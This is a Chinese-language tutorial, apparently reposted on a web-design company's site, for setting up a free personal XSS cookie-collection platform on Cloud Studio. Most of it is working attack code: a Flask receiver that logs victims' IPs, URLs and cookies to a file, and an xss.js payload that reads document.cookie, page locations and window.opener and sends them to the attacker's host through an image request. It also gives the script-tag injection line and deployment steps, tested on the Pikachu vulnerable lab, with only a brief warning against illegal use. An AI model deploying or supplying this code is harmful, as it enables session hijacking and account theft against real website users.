這篇文章給大家介紹怎么零成本搭建個人專屬XSS平臺，內(nèi)容非常詳細(xì)，感興趣的小伙伴們可以參考借鑒，希望對大家能有所幫助。

創(chuàng)新互聯(lián)建站主要從事網(wǎng)站建設(shè)、成都網(wǎng)站設(shè)計、網(wǎng)頁設(shè)計、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務(wù)。立足成都服務(wù)江南,十多年網(wǎng)站建設(shè)經(jīng)驗,價格優(yōu)惠、服務(wù)專業(yè),歡迎來電咨詢建站服務(wù):13518219792

0x00背景介紹

雖然現(xiàn)在網(wǎng)絡(luò)上有許多免費的XSS平臺，但使用體驗往往不是很好，經(jīng)常在配置時需要等待很長的加載時間，其中的腳本也難以自行修改，同時也存在可能的后臺數(shù)據(jù)泄露等問題。本文意在通過其他技術(shù)途徑，搭建一個臨時的個人專用公網(wǎng)XSS平臺。

使用技術(shù)及組件：

Cloud Studio：Coding旗下的云端開發(fā)環(huán)境，支持動態(tài)頁面托管

python2.7/3.5+flask

js代碼參考BlueLotus_XSSReceiver平臺代碼，可自行擴展

0x01 代碼及原理

平臺使用了兩個代碼文件：

xss.js：xss利用腳本，可擴展

app.py：網(wǎng)站主體文件，具體原理非常簡單，將xss利用腳本掛載到網(wǎng)站根目錄下，使用時將如下poc嵌入到xss漏洞處進行使用。

<script src="https://(個人域名)"></script>  //如果太長也可以自行生成短鏈

網(wǎng)站訪問后會運行js腳本請求一張指定源的圖片，通過該源構(gòu)造get請求到/rec目錄下，此目錄掛載的功能為處理參數(shù)并寫入到text.txt文件中，該文件即保存了我們最終所需要的cookie等數(shù)據(jù)。

app.py

# -*- coding: utf-8 -*-

from flask import Flask
from flask import render_template
from flask import request
import os
import datetime

APP_ROOT = os.path.dirname(os.path.abspath(__file__))   
TXT_PATH = os.path.join(APP_ROOT, 'templates') 
app = Flask(__name__)

@app.route('/')
def xss():
    return render_template('xss.js')
    
@app.route('/rec')
def rec():
    x=request.args
    ip=request.headers.getlist("X-Forwarded-For")[0]
    with open(os.path.join(TXT_PATH, 'text.txt'), 'a+') as f:
        f.write('--------------------------\n')
        print 'ok'
        f.write(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+'\n') 
        f.write('ip: '+ip+'\n')
        f.write('location: '+x['location']+'\n')
        f.write('toplocation: '+x['toplocation']+'\n')
        f.write('cookie: '+x['cookie']+'\n')
        f.write('opener: '+x['opener']+'\n')
            

    return 'ok'

if __name__ == '__main__':
    app.run(host='0.0.0.0')

xss.js

var website = "https://(個人域名)/rec";
(function() {
  (new Image()).src = website + '?location=' + escape((function() {
       try {
           return document.location.href
      } catch (e) {
           return ''
      }
  })()) + '&toplocation=' + escape((function() {
       try {
           return top.location.href
      } catch (e) {
           return ''
      }
  })()) + '&cookie=' + escape((function() {
       try {
           return document.cookie
      } catch (e) {
           return ''
      }
  })()) + '&opener=' + escape((function() {
       try {
           return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
      } catch (e) {
           return ''
      }
  })());
})();

0x02 具體部署

訪問國內(nèi)托管平臺Coding，注冊賬號并登錄，發(fā)布網(wǎng)站可能需要實名認(rèn)證

點擊右側(cè)Cloud Studio進入工作空間

初始化

點擊新建工作空間，設(shè)置工作空間名稱XssPlatform，預(yù)置環(huán)境Ubuntu 18.04，代碼來源為空

點擊進入，選擇Python Demo

進入后會發(fā)現(xiàn)存在問題，沒事先記錄一下這條安裝執(zhí)行命令，該命令具體含義為安裝程序所需相關(guān)python模塊并運行app.py

cat requirements.txt | xargs sudo pip install -i http://pypi.douban.com/simple --trusted-host pypi.douban.com && python app.py

關(guān)閉右下角框框，查看提示發(fā)現(xiàn)找不到pip命令，我們手動進行安裝

apt-get update #更新軟件源

apt-get upgrade #更新軟件

apt-get install python-pip #安裝python-pip組件

安裝成功后，重新執(zhí)行我們記錄下來的命令運行程序

運行成功后按下ctrl+shift+p啟動命令面板，輸入preview，在命令列表中點擊Open Preview Tab，點擊選擇我的第一個python項目即可查看網(wǎng)頁預(yù)覽，記錄url以便后續(xù)使用

平臺配置

ctrl+c結(jié)束python進程，打開app.py，復(fù)制代碼文章給出的代碼；

將templates下的index.html重命名為xss.js，復(fù)制代碼，將個人域名處替換為記錄下的網(wǎng)頁url

在控制臺輸入python app.py運行網(wǎng)站，然后在瀏覽器中輸入域名訪問，顯示為js代碼內(nèi)容即為配置成功

使用測試

使用pickachu開源漏洞靶場進行測試，進入反射型xss(post)，登入賬號，輸入利用poc，點擊提交

可以看到Cloud Studio中已經(jīng)多出了一個文本文件text.txt，內(nèi)容即為記錄的cookie等信息

0x03 注意事項

僅僅提供了一個簡單的平臺模型，更多的還是一種思路的拓展，請勿將其用于非法用途。

另外由于Cloud Studio的相關(guān)限制，平臺每天最多只能運行4個小時，關(guān)閉后就無法訪問

關(guān)于怎么零成本搭建個人專屬XSS平臺就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學(xué)到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。

分享名稱：怎么零成本搭建個人專屬XSS平臺
標(biāo)題路徑：http://chinadenli.net/article48/giedep.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供電子商務(wù)、網(wǎng)站設(shè)計、網(wǎng)站制作、定制網(wǎng)站、網(wǎng)站營銷、商城網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)